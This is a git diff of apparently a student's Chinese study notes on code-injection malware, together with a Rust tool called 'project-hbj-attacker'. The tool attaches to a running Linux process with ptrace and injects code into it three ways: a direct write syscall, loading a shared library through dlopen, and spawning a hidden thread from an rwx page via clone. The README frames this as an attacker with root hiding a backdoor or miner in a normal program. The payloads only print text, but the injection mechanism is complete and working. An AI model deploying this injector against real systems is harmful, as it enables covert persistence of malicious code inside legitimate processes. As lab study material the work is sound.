diff --git a/.idea/editor.xml b/.idea/editor.xml
new file mode 100644
index 0000000..198c798
--- /dev/null
+++ b/.idea/editor.xml
@@ -0,0 +1,345 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/01/README.md b/01/README.md
index 7cd0a18..567106d 100644
--- a/01/README.md
+++ b/01/README.md
@@ -1,8 +1,6 @@
# 论文精读1
----
-
**Behavior Nets: Context-Aware Behavior Modeling for Code Injection-Based Windows Malware**
## 问题分析
@@ -407,8 +405,34 @@ static ssize_t process_vm_rw_core(pid_t pid, struct iov_iter *iter,
故而,我们已经可以得出 **process_vm_readv/writev** 同样受Yama的影响的结论了。
-### /dev/mem
-
### 例外的情况
-## 实验验证
\ No newline at end of file
+需要额外指出的是,Yama并不会阻止root进程对非root进程进行ptrace,因此下面的实验将以**攻击者已经root机器**为前提,他们下一步的目的是把自己的某个任务(可能是后门、挖矿程序)隐藏在某个正常的程序之中。
+
+## 实验验证
+
+### 一个靶程序
+
+为了后续的实验方便,有必要编写一个有基本IO功能,但没有复杂行为的“靶程序”。
+
+```cpp
+#include
+#include
+#include
+
+int main()
+{
+ pid_t pid = getpid();
+ std::cout << "Pid: " << pid << std::endl;
+
+ while(true)
+ {
+ sleep(0);
+ }
+}
+```
+
+如代码所示,该程序运行后只是简单的展示自己的pid,然后不断地让出CPU控制权。
+这里没有用IO操作(如getline)去阻塞的原因是那会让OS不调度这个进程,进程会持续在后台休眠,而现实中的进程通常总是在做一些事。
+如果用getline去阻塞进程,那么这个靶程序可能会一直阻塞在syscall里面——而不去执行我们主动注入的代码。
+
diff --git a/01/project-hbj-attacker/.idea/.gitignore b/01/project-hbj-attacker/.idea/.gitignore
new file mode 100644
index 0000000..13566b8
--- /dev/null
+++ b/01/project-hbj-attacker/.idea/.gitignore
@@ -0,0 +1,8 @@
+# Default ignored files
+/shelf/
+/workspace.xml
+# Editor-based HTTP Client requests
+/httpRequests/
+# Datasource local storage ignored files
+/dataSources/
+/dataSources.local.xml
diff --git a/01/project-hbj-attacker/.idea/modules.xml b/01/project-hbj-attacker/.idea/modules.xml
new file mode 100644
index 0000000..09f80e4
--- /dev/null
+++ b/01/project-hbj-attacker/.idea/modules.xml
@@ -0,0 +1,8 @@
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/01/project-hbj-attacker/.idea/project-hbj-attacker.iml b/01/project-hbj-attacker/.idea/project-hbj-attacker.iml
new file mode 100644
index 0000000..cf84ae4
--- /dev/null
+++ b/01/project-hbj-attacker/.idea/project-hbj-attacker.iml
@@ -0,0 +1,11 @@
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/01/project-hbj-attacker/.idea/vcs.xml b/01/project-hbj-attacker/.idea/vcs.xml
new file mode 100644
index 0000000..b2bdec2
--- /dev/null
+++ b/01/project-hbj-attacker/.idea/vcs.xml
@@ -0,0 +1,6 @@
+
+
+
+
+
+
\ No newline at end of file
diff --git a/01/project-hbj-attacker/Cargo.lock b/01/project-hbj-attacker/Cargo.lock
new file mode 100644
index 0000000..c965703
--- /dev/null
+++ b/01/project-hbj-attacker/Cargo.lock
@@ -0,0 +1,218 @@
+# This file is automatically @generated by Cargo.
+# It is not intended for manual editing.
+version = 4
+
+[[package]]
+name = "bitflags"
+version = "2.10.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "812e12b5285cc515a9c72a5c1d3b6d46a19dac5acfef5265968c166106e31dd3"
+
+[[package]]
+name = "byteorder"
+version = "1.5.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1fd0f2584146f6f2ef48085050886acf353beff7305ebd1ae69500e27c67f64b"
+
+[[package]]
+name = "cfg-if"
+version = "1.0.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9330f8b2ff13f34540b44e946ef35111825727b38d33286ef986142615121801"
+
+[[package]]
+name = "cfg_aliases"
+version = "0.2.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "613afe47fcd5fac7ccf1db93babcb082c5994d996f20b8b159f2ad1658eb5724"
+
+[[package]]
+name = "ctor"
+version = "0.6.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "59c9b8bdf64ee849747c1b12eb861d21aa47fa161564f48332f1afe2373bf899"
+dependencies = [
+ "ctor-proc-macro",
+ "dtor",
+]
+
+[[package]]
+name = "ctor-proc-macro"
+version = "0.0.7"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "52560adf09603e58c9a7ee1fe1dcb95a16927b17c127f0ac02d6e768a0e25bc1"
+
+[[package]]
+name = "dtor"
+version = "0.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e58a0764cddb55ab28955347b45be00ade43d4d6f3ba4bf3dc354e4ec9432934"
+dependencies = [
+ "dtor-proc-macro",
+]
+
+[[package]]
+name = "dtor-proc-macro"
+version = "0.0.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f678cf4a922c215c63e0de95eb1ff08a958a81d47e485cf9da1e27bf6305cfa5"
+
+[[package]]
+name = "dynasm"
+version = "4.0.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6a31e49f416ec431ceef002ee220eee9da97687ec3ecea8040703edbaa75e157"
+dependencies = [
+ "bitflags",
+ "byteorder",
+ "lazy_static",
+ "proc-macro-error2",
+ "proc-macro2",
+ "quote",
+ "syn",
+]
+
+[[package]]
+name = "dynasmrt"
+version = "4.0.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "81897269eb88949825a9add5a33fb4456ba6a39811e0909172f21c841457d347"
+dependencies = [
+ "byteorder",
+ "dynasm",
+ "fnv",
+ "memmap2",
+]
+
+[[package]]
+name = "fnv"
+version = "1.0.7"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3f9eec918d3f24069decb9af1554cad7c880e2da24a9afd88aca000531ab82c1"
+
+[[package]]
+name = "iced-x86"
+version = "1.21.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7c447cff8c7f384a7d4f741cfcff32f75f3ad02b406432e8d6c878d56b1edf6b"
+dependencies = [
+ "lazy_static",
+]
+
+[[package]]
+name = "lazy_static"
+version = "1.5.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "bbd2bcb4c963f2ddae06a2efc7e9f3591312473c50c6685e1f298068316e66fe"
+
+[[package]]
+name = "libc"
+version = "0.2.177"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "2874a2af47a2325c2001a6e6fad9b16a53b802102b528163885171cf92b15976"
+
+[[package]]
+name = "libloading"
+version = "0.8.9"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d7c4b02199fee7c5d21a5ae7d8cfa79a6ef5bb2fc834d6e9058e89c825efdc55"
+dependencies = [
+ "cfg-if",
+ "windows-link",
+]
+
+[[package]]
+name = "memmap2"
+version = "0.9.9"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "744133e4a0e0a658e1374cf3bf8e415c4052a15a111acd372764c55b4177d490"
+dependencies = [
+ "libc",
+]
+
+[[package]]
+name = "nix"
+version = "0.30.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "74523f3a35e05aba87a1d978330aef40f67b0304ac79c1c00b294c9830543db6"
+dependencies = [
+ "bitflags",
+ "cfg-if",
+ "cfg_aliases",
+ "libc",
+]
+
+[[package]]
+name = "proc-macro-error-attr2"
+version = "2.0.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "96de42df36bb9bba5542fe9f1a054b8cc87e172759a1868aa05c1f3acc89dfc5"
+dependencies = [
+ "proc-macro2",
+ "quote",
+]
+
+[[package]]
+name = "proc-macro-error2"
+version = "2.0.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "11ec05c52be0a07b08061f7dd003e7d7092e0472bc731b4af7bb1ef876109802"
+dependencies = [
+ "proc-macro-error-attr2",
+ "proc-macro2",
+ "quote",
+ "syn",
+]
+
+[[package]]
+name = "proc-macro2"
+version = "1.0.101"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "89ae43fd86e4158d6db51ad8e2b80f313af9cc74f5c0e03ccb87de09998732de"
+dependencies = [
+ "unicode-ident",
+]
+
+[[package]]
+name = "project-hbj-attacker"
+version = "0.1.0"
+dependencies = [
+ "ctor",
+ "dynasmrt",
+ "iced-x86",
+ "libc",
+ "libloading",
+ "nix",
+]
+
+[[package]]
+name = "quote"
+version = "1.0.41"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ce25767e7b499d1b604768e7cde645d14cc8584231ea6b295e9c9eb22c02e1d1"
+dependencies = [
+ "proc-macro2",
+]
+
+[[package]]
+name = "syn"
+version = "2.0.107"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "2a26dbd934e5451d21ef060c018dae56fc073894c5a7896f882928a76e6d081b"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "unicode-ident",
+]
+
+[[package]]
+name = "unicode-ident"
+version = "1.0.20"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "462eeb75aeb73aea900253ce739c8e18a67423fadf006037cd3ff27e82748a06"
+
+[[package]]
+name = "windows-link"
+version = "0.2.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f0805222e57f7521d6a62e36fa9163bc891acd422f971defe97d64e70d0a4fe5"
diff --git a/01/project-hbj-attacker/Cargo.toml b/01/project-hbj-attacker/Cargo.toml
new file mode 100644
index 0000000..b39f5be
--- /dev/null
+++ b/01/project-hbj-attacker/Cargo.toml
@@ -0,0 +1,19 @@
+[package]
+name = "project-hbj-attacker"
+version = "0.1.0"
+edition = "2024"
+
+[dependencies]
+dynasmrt = "4.0.1"
+iced-x86 = { version = "1.21.0", features = ["code_asm"] }
+libc = "0.2.177"
+nix = { version = "0.30.1", features = ["ptrace", "uio"] }
+ctor = "0.6.0"
+libloading = "0.8.9"
+
+[profile.dev]
+opt-level = 0
+debug = true
+
+[lib]
+crate-type = ["cdylib"]
\ No newline at end of file
diff --git a/01/project-hbj-attacker/src/helper.rs b/01/project-hbj-attacker/src/helper.rs
new file mode 100644
index 0000000..a9fd1e1
--- /dev/null
+++ b/01/project-hbj-attacker/src/helper.rs
@@ -0,0 +1,10 @@
+mod map;
+mod processes;
+
+pub use map::is_address_in_range;
+pub use processes::get_pid_by_name;
+pub use processes::read_memory_vm;
+pub use processes::write_memory_vm;
+pub use processes::write_memory_ptrace;
+pub use map::first_rw_segment;
+pub use map::module_base_address;
\ No newline at end of file
diff --git a/01/project-hbj-attacker/src/helper/map.rs b/01/project-hbj-attacker/src/helper/map.rs
new file mode 100644
index 0000000..7d96012
--- /dev/null
+++ b/01/project-hbj-attacker/src/helper/map.rs
@@ -0,0 +1,73 @@
+
+pub fn is_address_in_range(addr: u64, range_strings: &Vec<&str>) -> bool {
+ for range_str in range_strings {
+ if let Some((start, end)) = parse_address_range(range_str) {
+ if addr >= start && addr < end {
+ return true;
+ }
+ }
+ }
+ false
+}
+
+fn parse_address_range(range_str: &str) -> Option<(u64, u64)> {
+ let parts: Vec<&str> = range_str.split_whitespace().collect();
+ if parts.is_empty() {
+ return None;
+ }
+
+ let range_part = parts[0];
+
+ let range_parts: Vec<&str> = range_part.split('-').collect();
+ if range_parts.len() != 2 {
+ return None;
+ }
+
+ let start_addr = u64::from_str_radix(range_parts[0], 16).ok()?;
+ let end_addr = u64::from_str_radix(range_parts[1], 16).ok()?;
+
+ Some((start_addr, end_addr))
+}
+
+pub fn first_rw_segment(range_strings: &Vec<&str>) -> Option<(u64, u64)> {
+ for range_str in range_strings {
+ let parts: Vec<&str> = range_str.split_whitespace().collect();
+ if parts.len() < 2 {
+ continue;
+ }
+
+ let perms = parts[1];
+ if perms.starts_with("rw") {
+ if let Some((start, end)) = parse_address_range(range_str) {
+ return Some((start, end));
+ }
+ }
+ }
+ None
+}
+
+pub fn module_base_address(range_strings: &Vec<&str>, module_name: &str) -> Option {
+ let mut base_addr: Option = None;
+
+ for range_str in range_strings {
+ let parts: Vec<&str> = range_str.split_whitespace().collect();
+ if parts.len() < 6 {
+ continue;
+ }
+
+ let path = parts.last().unwrap();
+
+ if let Some(filename) = std::path::Path::new(path).file_name().and_then(|f| f.to_str()) {
+ if filename.contains(module_name) {
+ if let Some((start, _)) = parse_address_range(range_str) {
+ base_addr = match base_addr {
+ Some(current_min) => Some(current_min.min(start)),
+ None => Some(start),
+ };
+ }
+ }
+ }
+ }
+
+ base_addr
+}
diff --git a/01/project-hbj-attacker/src/helper/processes.rs b/01/project-hbj-attacker/src/helper/processes.rs
new file mode 100644
index 0000000..cae693f
--- /dev/null
+++ b/01/project-hbj-attacker/src/helper/processes.rs
@@ -0,0 +1,160 @@
+use std::collections::HashMap;
+use std::fs;
+
+use nix::sys::uio::{process_vm_readv, RemoteIoVec, process_vm_writev};
+use nix::unistd::Pid;
+use std::error::Error;
+use std::io::{IoSliceMut, IoSlice};
+use nix::sys::ptrace;
+use std::mem;
+fn list_processes() -> Result, std::io::Error>
+{
+ let mut processes = HashMap::::new();
+
+ let entries = fs::read_dir("/proc")?;
+ let dirs = entries.filter_map(|e| {
+ let e = e.ok()?;
+ let path = e.path();
+ if path.is_dir() {
+ return path.file_name()?.to_str().map(|s| s.to_string());
+ }
+ None::
+ }).collect::>();
+
+ for dir in dirs {
+ let Ok(pid) = dir.parse::() else { continue };
+ let pid_path = format!("/proc/{}/exe", dir);
+ let Ok(name_path) = fs::read_link(&pid_path) else { continue };
+ let name_path = name_path.to_string_lossy().to_string();
+
+ if let Some(name) = name_path.split("/").last() {
+ processes.insert(name.to_string(), pid);
+ println!("{} -> {}", name, dir);
+ }
+ }
+
+ Ok(processes)
+}
+
+pub fn get_pid_by_name(name: &str) -> Result
+{
+ let ps = list_processes()?;
+ Ok(ps[name])
+}
+
+pub fn read_memory_vm(pid: Pid, start_addr: usize, size: usize) -> Result, Box> {
+ let mut buffer = vec![0u8; size];
+
+ let mut local_iov = [IoSliceMut::new(&mut buffer)];
+
+ let remote_iov = [RemoteIoVec {
+ base: start_addr,
+ len: size,
+ }];
+
+ let bytes_read = process_vm_readv(pid, &mut local_iov, &remote_iov)?;
+
+ if bytes_read == size {
+ Ok(buffer)
+ } else {
+ buffer.truncate(bytes_read);
+ Ok(buffer)
+ }
+}
+
+pub fn write_memory_vm(pid: Pid, mut start_addr: usize, mut data: &[u8]) -> Result> {
+ let mut total_written = 0usize;
+ while !data.is_empty() {
+ let local_iov = [IoSlice::new(data)];
+ let remote_iov = [RemoteIoVec {
+ base: start_addr,
+ len: data.len(),
+ }];
+
+ let written = process_vm_writev(pid, &local_iov, &remote_iov)?;
+
+ if written == 0 {
+ return Err(format!("process_vm_writev returned 0 (no progress) after writing {} bytes", total_written).into());
+ }
+
+ total_written += written;
+ start_addr = start_addr.wrapping_add(written);
+ data = &data[written..];
+ }
+
+ Ok(total_written)
+}
+
+pub fn write_memory_ptrace(pid: Pid, start_addr: usize, data: &[u8]) -> Result> {
+ let word_size = mem::size_of::();
+ if word_size == 0 {
+ return Err("invalid word size".into());
+ }
+
+ let mut addr = start_addr;
+ let mut remaining = data;
+ let mut written = 0usize;
+
+ if addr % word_size != 0 && !remaining.is_empty() {
+ let n = write_unaligned_head(pid, addr, remaining, word_size)?;
+ addr += n;
+ remaining = &remaining[n..];
+ written += n;
+ }
+
+ while remaining.len() >= word_size {
+ let n = write_full_word(pid, addr, &remaining[..word_size])?;
+ addr += n;
+ remaining = &remaining[n..];
+ written += n;
+ }
+
+ if !remaining.is_empty() {
+ let n = write_unaligned_tail(pid, addr, remaining, word_size)?;
+ written += n;
+ }
+
+ Ok(written)
+}
+
+fn write_unaligned_head(
+ pid: Pid,
+ addr: usize,
+ data: &[u8],
+ word_size: usize,
+) -> Result> {
+ let head_offset = addr % word_size;
+ let aligned_addr = addr - head_offset;
+ let orig_word = ptrace::read(pid, aligned_addr as *mut libc::c_void)?;
+ let mut bytes = orig_word.to_ne_bytes();
+
+ let copy_len = usize::min(word_size - head_offset, data.len());
+ bytes[head_offset..head_offset + copy_len].copy_from_slice(&data[..copy_len]);
+ let new_word = libc::c_long::from_ne_bytes(bytes);
+
+ ptrace::write(pid, aligned_addr as *mut libc::c_void, new_word)?;
+ Ok(copy_len)
+}
+
+fn write_full_word(pid: Pid, addr: usize, data: &[u8]) -> Result> {
+ let mut arr = [0u8; mem::size_of::()];
+ arr.copy_from_slice(data);
+ let val = libc::c_long::from_ne_bytes(arr);
+ ptrace::write(pid, addr as *mut libc::c_void, val)?;
+ Ok(mem::size_of::())
+}
+
+fn write_unaligned_tail(
+ pid: Pid,
+ addr: usize,
+ data: &[u8],
+ _word_size: usize,
+) -> Result> {
+ let orig_word = ptrace::read(pid, addr as *mut libc::c_void)?;
+ let mut bytes = orig_word.to_ne_bytes();
+ bytes[..data.len()].copy_from_slice(data);
+ let new_word = libc::c_long::from_ne_bytes(bytes);
+
+ ptrace::write(pid, addr as *mut libc::c_void, new_word)?;
+ Ok(data.len())
+}
diff --git a/01/project-hbj-attacker/src/lib.rs b/01/project-hbj-attacker/src/lib.rs
new file mode 100644
index 0000000..4f8cfca
--- /dev/null
+++ b/01/project-hbj-attacker/src/lib.rs
@@ -0,0 +1,22 @@
+
+use std::io::{self, Write};
+use std::thread;
+use std::time::Duration;
+
+#[ctor::ctor]
+fn init() {
+ thread::spawn(|| {
+ let mut i = 0i64;
+ loop {
+ print!("[{}] I am injected library, I am running... \r\n", i);
+ io::stdout().flush().unwrap();
+ i += 1;
+ thread::sleep(Duration::from_secs(1));
+ }
+ });
+}
+
+#[unsafe(no_mangle)]
+pub extern "C" fn dummy() {
+
+}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/src/main.rs b/01/project-hbj-attacker/src/main.rs
new file mode 100644
index 0000000..ce726d1
--- /dev/null
+++ b/01/project-hbj-attacker/src/main.rs
@@ -0,0 +1,254 @@
+
+#![allow(unused_imports)]
+
+mod helper;
+
+use std::arch::asm;
+use std::ffi::CString;
+use nix::sys::ptrace;
+use nix::sys::wait::waitpid;
+use nix::unistd::Pid;
+
+use std::fs;
+use std::io::BufRead;
+use helper::*;
+use iced_x86::{code_asm::*, Instruction};
+use iced_x86::code_asm::asm_traits::CodeAsmJmp;
+use libc::{user_regs_struct};
+use libc::{c_void, dlsym, RTLD_NEXT};
+
+const GREEN: &str = "\x1b[32m";
+const RESET: &str = "\x1b[0m";
+
+fn inject1(pid: Pid, seg_rw: (u64, u64), regs: user_regs_struct) -> Result<(), Box> // Simple injection
+{
+ let injected_data = "You are injected. \r\n";
+ write_memory_vm(pid, seg_rw.0 as usize, &injected_data.as_bytes())?;
+
+ let mut asm = CodeAssembler::new(64)?;
+
+ asm.mov(rax, 1u64)?; // Syscall 1 (write)
+ asm.mov(rdi, 1u64)?; // Fd 1 (STDOUT)
+ asm.mov(rsi, seg_rw.0)?; // Buffer pointer (Here is rw segment in target)
+ asm.mov(rdx, injected_data.as_bytes().len() as u64)?; // Buffer length
+ asm.syscall()?; // Syscall interrupt
+
+ asm.int3()?; // (Important!!!) Use int3 interrupt to retrieve control flow
+
+ let injected_inst = asm.assemble(regs.rip as u64)?;
+ write_memory_ptrace(pid, regs.rip as usize, &injected_inst)?;
+
+ // Continue target
+ ptrace::cont(pid, None)?;
+ waitpid(pid, None)?;
+
+ Ok(())
+}
+
+fn inject2(pid: Pid, seg_rw: (u64, u64), regs: user_regs_struct) -> Result<(), Box> // ld injection
+{
+ // Get the absolute path to our shared library
+ let lib_path = fs::canonicalize("./target/debug/libproject_hbj_attacker.so")?.to_string_lossy().into_owned();
+ let cpid = nix::unistd::getpid().to_string();
+
+ // Read our own process memory maps to find libc base address
+ let self_maps = fs::read_to_string(format!("/proc/{}/maps", cpid))?;
+ let self_map_lines = self_maps.lines().collect::>();
+ let mut dlopen_offset: u64 = 0;
+
+ // Find libc base address in our own process
+ let Some(libc_base_local) = module_base_address(&self_map_lines, "libc.so") else
+ { return Err(Box::new(std::io::Error::new(std::io::ErrorKind::Other, "libc not found"))); };
+
+ println!("{GREEN}[local]{RESET} libc base: {:#016x}", libc_base_local);
+
+ // Use dlsym to get the address of dlopen in our own process
+ unsafe{
+ let dlopen_addr_local = dlsym(RTLD_NEXT, b"dlopen\0".as_ptr() as *const _);
+ // Calculate offset of dlopen from libc base in our process
+ dlopen_offset = dlopen_addr_local as u64 - libc_base_local;
+ }
+
+ println!("{GREEN}[local]{RESET} dlopen offset = {:#016x}", dlopen_offset);
+
+ // Read target process memory maps to find its libc base address
+ let target_maps = fs::read_to_string(format!("/proc/{}/maps", pid))?;
+ let target_map_lines = target_maps.lines().collect::>();
+
+ // Find libc base address in target process
+ let Some(libc_base_target) = module_base_address(&target_map_lines, "libc.so") else
+ { return Err(Box::new(std::io::Error::new(std::io::ErrorKind::Other, "libc not found"))); };
+
+ println!("{GREEN}[trace]{RESET} libc base = {:#016x}", libc_base_target);
+
+ // Calculate dlopen address in target process using the same offset
+ let target_dlopen_addr = libc_base_target + dlopen_offset;
+ println!("{GREEN}[trace]{RESET} dlopen address = {:#016x}", target_dlopen_addr);
+
+
+ // Start Inject
+ let c_lib_path = CString::new(lib_path).unwrap();
+ write_memory_vm(pid, seg_rw.0 as usize, c_lib_path.as_bytes_with_nul())?;
+ println!("{GREEN}[trace]{RESET} write {} to {:#016x}", &c_lib_path.to_string_lossy(), seg_rw.0);
+
+ let mut asm = CodeAssembler::new(64)?;
+ asm.mov(rdi, seg_rw.0)?; // Param 1: Filename
+ asm.mov(rsi, 2u64)?; // Param 2: Flag, 2(RTLD_NOW)
+ asm.call(target_dlopen_addr)?; // Syscall interrupt
+
+ asm.int3()?; // (Important!!!) Use int3 interrupt to retrieve control flow
+ let injected_inst = asm.assemble(regs.rip as u64)?;
+ write_memory_ptrace(pid, regs.rip as usize, &injected_inst)?;
+ println!("{GREEN}[trace]{RESET} write instructions to {:#016x}", regs.rip);
+
+ // Continue target
+ ptrace::cont(pid, None)?;
+ println!("{GREEN}[trace]{RESET} running...");
+ waitpid(pid, None)?;
+ println!("{GREEN}[trace]{RESET} int3!");
+ Ok(())
+}
+
+fn inject3(pid: Pid, seg_rw: (u64, u64), regs: user_regs_struct) -> Result<(), Box> // thread inject
+{
+ // Alloc rwx memory
+ let mut asm = CodeAssembler::new(64)?;
+
+ asm.mov(rax, 9u64)?; // Syscall 9 (mmap)
+
+ asm.mov(rdi, 1u64)?; // Addr
+ asm.mov(rsi, 4096u64)?; // Length, we alloc a page (4K)
+ asm.mov(rdx, (libc::PROT_READ | libc::PROT_WRITE | libc::PROT_EXEC) as u64)?; // Set protect to rwx
+ asm.mov(r10, (libc::MAP_SHARED | libc::MAP_ANONYMOUS) as u64)?; // Private and anonymous
+ asm.mov(r8, 01i64)?; // Fd (-1 because we want anonymous)
+ asm.mov(r9, 0u64)?; // Offset
+
+ asm.syscall()?; // Syscall interrupt
+ asm.int3()?; // (Important!!!) Use int3 interrupt to retrieve control flow
+
+ let injected_inst = asm.assemble(regs.rip as u64)?;
+ write_memory_ptrace(pid, regs.rip as usize, &injected_inst)?;
+ println!("{GREEN}[trace]{RESET} write instructions to {:#016x}", regs.rip);
+
+ // Continue target
+ ptrace::cont(pid, None)?;
+ println!("{GREEN}[trace]{RESET} running...");
+ waitpid(pid, None)?;
+ println!("{GREEN}[trace]{RESET} int3!");
+
+ let regs_after_map = ptrace::getregs(pid)?;
+ let page_addr = regs_after_map.rax as usize;
+ println!("{GREEN}[trace]{RESET} allocated page is at {:#016x}", page_addr);
+
+ let injected_data = "I am injected thread, I am running... \r\n";
+ write_memory_vm(pid, page_addr + 0x500, &injected_data.as_bytes())?;
+ write_memory_vm(pid, page_addr + 0x600, &1i64.to_le_bytes())?;
+ write_memory_vm(pid, page_addr + 0x608, &0u64.to_le_bytes())?;
+
+ asm = CodeAssembler::new(64)?;
+ // Construct inject payload
+ let mut target_label = asm.create_label();
+
+ asm.set_label(&mut target_label)?;
+ asm.mov(rax, 1u64)?; // Syscall 1 (write)
+ asm.mov(rdi, 1u64)?; // Fd 1 (STDOUT)
+ asm.mov(rsi, (page_addr + 0x500) as u64)?; // Buffer pointer (Here is page_addr + 0x500)
+ asm.mov(rdx, injected_data.as_bytes().len() as u64)?; // Buffer length
+ asm.syscall()?; // Syscall interrupt
+
+ asm.mov(rax, 35u64)?; // Syscall 35 (nano sleep)
+ asm.mov(rdi, (page_addr + 0x600) as u64)?; // Req
+ asm.mov(rsi, 0u64)?; //Rem
+ asm.syscall()?; // Syscall interrupt
+
+ asm.jmp(target_label)?; // Jmp back to loop
+
+ let injected_payload = asm.assemble(page_addr as u64)?;
+ write_memory_vm(pid, page_addr, &injected_payload)?;
+ println!("{GREEN}[trace]{RESET} write payload to {:#016x}", page_addr);
+
+ // Start Trigger
+ let regs = ptrace::getregs(pid)?;
+
+ asm = CodeAssembler::new(64)?;
+
+ asm.mov(rax, 56u64)?; // Syscall 56 (clone)
+
+ asm.mov(rdi, (libc::CLONE_VM | libc::CLONE_FS | libc::CLONE_FILES | libc::CLONE_SIGHAND | libc::CLONE_THREAD) as u64)?; // Flags
+ asm.mov(rsi, (page_addr + 0x800) as u64)?; // Stack top
+
+ asm.mov(rdx, 0u64)?; // parent_tid = NULL
+ asm.mov(r10, 0u64)?; // child_tid = NULL
+ asm.mov(r8, 0u64)?; // tls = NULL
+
+ asm.syscall()?; // Syscall interrupt
+ asm.test(eax, eax)?; // Syscall returns zero?
+ asm.jz(page_addr as u64)?;
+
+ asm.int3()?; // (Important!!!) Use int3 interrupt to retrieve control flow
+
+ let injected_trigger = asm.assemble(regs.rip as u64)?;
+ write_memory_ptrace(pid, regs.rip as usize, &injected_trigger)?;
+ println!("{GREEN}[trace]{RESET} write trigger to {:#016x}", regs.rip);
+
+ // Continue target
+ ptrace::cont(pid, None)?;
+ waitpid(pid, None)?;
+
+ Ok(())
+}
+
+fn main() -> Result<(), Box> {
+
+ // Find our target program
+ let pid = Pid::from_raw(get_pid_by_name("target")?);
+
+ let target = fs::read_link(format!("/proc/{}/exe", pid))?.to_string_lossy().into_owned();
+ let content = fs::read_to_string(format!("/proc/{}/maps", pid))?;
+ let lines: Vec<&str> = content
+ .lines()
+ .filter(|&line| !line.is_empty() && line.contains(&target))
+ .collect();
+
+ for line in &lines {
+ println!("{GREEN}[memory map]{RESET} {}", line);
+ }
+
+ let Some(seg_rw) = first_rw_segment(&lines) else { return Err(Box::new(std::io::Error::new(std::io::ErrorKind::Other, "first rw segment not found"))); };
+
+ ptrace::attach(pid)?;
+ waitpid(pid, None)?;
+
+ loop{
+ // Single-stepping, so that RIP returns to the user space of the process itself,
+ // rather than in some other library
+ let regs = ptrace::getregs(pid)?;
+ if is_address_in_range(regs.rip, &lines)
+ {
+ println!("{GREEN}[trace]{RESET} Address: {:#x}", regs.rip);
+ break;
+ }
+ ptrace::step(pid, None)?;
+ waitpid(pid, None)?;
+ }
+
+ // Save context
+ let regs = ptrace::getregs(pid)?; // Save current registers
+ let buffer = read_memory_vm(pid, regs.rip as usize, 128)?; // Save current memory context
+ let buffer_rw = read_memory_vm(pid, seg_rw.0 as usize, 128)?; // Save current rw memory
+
+ // Do inject here
+
+ inject3(pid, seg_rw, regs)?;
+
+ // End inject logics
+
+ // Restore context
+ ptrace::setregs(pid, regs)?;
+ write_memory_ptrace(pid, regs.rip as usize, &buffer)?;
+ write_memory_vm(pid, seg_rw.0 as usize, &buffer_rw)?;
+
+ ptrace::detach(pid, None)?;
+
+ Ok(())
+}
diff --git a/01/project-hbj-attacker/target/.rustc_info.json b/01/project-hbj-attacker/target/.rustc_info.json
new file mode 100644
index 0000000..81971b1
--- /dev/null
+++ b/01/project-hbj-attacker/target/.rustc_info.json
@@ -0,0 +1 @@
